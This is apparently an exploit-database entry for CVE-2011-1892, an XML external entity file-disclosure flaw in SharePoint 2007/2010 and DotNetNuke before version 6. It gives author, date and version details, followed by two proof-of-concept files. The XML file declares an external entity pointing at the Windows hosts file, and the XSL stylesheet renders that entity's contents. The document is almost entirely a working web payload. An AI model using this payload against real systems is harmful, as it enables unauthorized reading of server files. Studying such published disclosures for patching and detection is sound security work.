21 lines
No EOL
568 B
Text
21 lines
No EOL
568 B
Text
Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
|
|
Date: September 15, 2011
|
|
Author: Nicolas Gregoire
|
|
Version: SharePoint 2007 / 2010, DotNetNuke < 6
|
|
CVE : CVE-2011-1892
|
|
|
|
poc filename: xee.xml
|
|
|
|
<!DOCTYPE doc [
|
|
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
|
|
]>
|
|
<doc>&boom;</doc>
|
|
|
|
poc filename: xee.xsl
|
|
|
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
|
<xsl:template match="/">
|
|
<xsl:apply-templates/>
|
|
<xsl:value-of select="doc"/>
|
|
</xsl:template>
|
|
</xsl:stylesheet> |